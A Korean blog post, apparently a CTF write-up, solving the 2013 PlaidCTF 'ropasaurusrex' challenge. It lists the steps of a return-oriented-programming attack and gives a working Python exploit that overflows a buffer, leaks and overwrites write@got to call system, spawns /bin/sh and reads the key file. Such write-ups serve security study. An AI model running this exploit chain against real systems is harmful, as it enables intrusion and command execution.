2013 pctf ropasaurusrex

Posted by Hide­
2015.09.23 23:58 CTF(pwnable)

공격 시나리오


1. write 함수를 이용하여 write@got 주소 leak


2. write와 system함수의 거리를 이용하여 system 함수 주소 유추


3. read@plt를 이용하여 bss섹션에 /bin/sh 쓰기


4. read@plt를 이용하여 write@got에 system함수를 overwrite


5. overwrite한 write@got를 이용하여 system함수 호출


6. 명령 실행




[exploit code]

from socket import *

from struct import *


p = lambda x:pack("<L", x)

up = lambda x:unpack("<L", x)[0]


bss = p(0x08049628)

pppr = p(0x080484b6)

write_plt = p(0x0804830c)

write_got = p(0x08049614)

read_plt = p(0x0804832c)

offset = 0x9b3e0

cmd = "/bin/sh"


s = socket(AF_INET, SOCK_STREAM)

s.connect(("localhost", 9999))


#write@got leak

payload = ""

payload += "a" * 140

payload += write_plt

payload += pppr

payload += p(1)

payload += write_got

payload += p(4)


# /bin/sh -> bss section

payload += read_plt

payload += pppr

payload += p(0)

payload += bss

payload += p(len(cmd))


#write@got overwriting

payload += read_plt

payload += pppr

payload += p(0)

payload += write_got

payload += p(4)


#call write(system)

payload += write_plt

payload += "aaaa"

payload += bss


s.send(payload + "\n")

write = up(s.recv(4))

system = write - offset

print "write = "+hex(write)

print "system = "+hex(system)


s.send(cmd)

s.send(p(system))


s.send("cat /home/hide/rop/key\n")

print s.recv(1024)

s.close()


서버환경 : Ubuntu 14



다른 사람들이 많이 읽은 글

'CTF(pwnable)' 카테고리의 다른 글

[2014 Codegate] angry_doraemon  (0) 2016.07.07
2013 pctf ropasaurusrex  (0) 2015.09.23
이 댓글을 비밀 댓글로

티스토리 툴바